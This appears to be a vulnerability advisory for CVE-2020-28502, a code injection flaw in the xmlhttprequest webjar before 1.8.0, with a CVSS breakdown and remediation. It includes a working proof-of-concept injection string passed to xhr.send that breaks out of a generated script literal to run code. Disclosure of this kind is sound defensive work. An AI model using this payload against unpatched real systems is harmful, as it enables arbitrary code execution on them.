Arbitrary Code Injection

Affecting org.webjars.npm:xmlhttprequest artifact, versions [,1.8.0)


Overview

org.webjars.npm:xmlhttprequest is a wrapper for the built-in http client to emulate the browser XMLHttpRequest object.

Affected versions of this package are vulnerable to Arbitrary Code Injection. When a request is sent synchronously (third argument of xhr.open set to false; asynchronous requests, the default, are not affected), the library performs the request in a child node process whose script is assembled by string concatenation, with the body passed to xhr.send spliced into a JavaScript string literal. Malicious user input flowing into xhr.send can break out of that literal and inject arbitrary JavaScript, which then runs with the privileges of the calling process.

POC

const { XMLHttpRequest } = require("xmlhttprequest")

const xhr = new XMLHttpRequest()
// Third argument false = synchronous request; this is the affected code path.
xhr.open("POST", "http://localhost.invalid/", false)
// The leading backslash defeats the quote escaping, so the body closes the
// generated script's string literal early; the injected statement runs in the
// child process, req.end() completes the request, and // discards the rest.
xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//")

Remediation

Upgrade org.webjars.npm:xmlhttprequest to version 1.8.0 or higher.

CVSS Score

8.1
high severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit
rinsuki
CVE
CVE-2020-28502
CWE
CWE-94
Snyk ID
SNYK-JAVA-ORGWEBJARSNPM-1082938
Disclosed
05 Mar, 2021
Published
05 Mar, 2021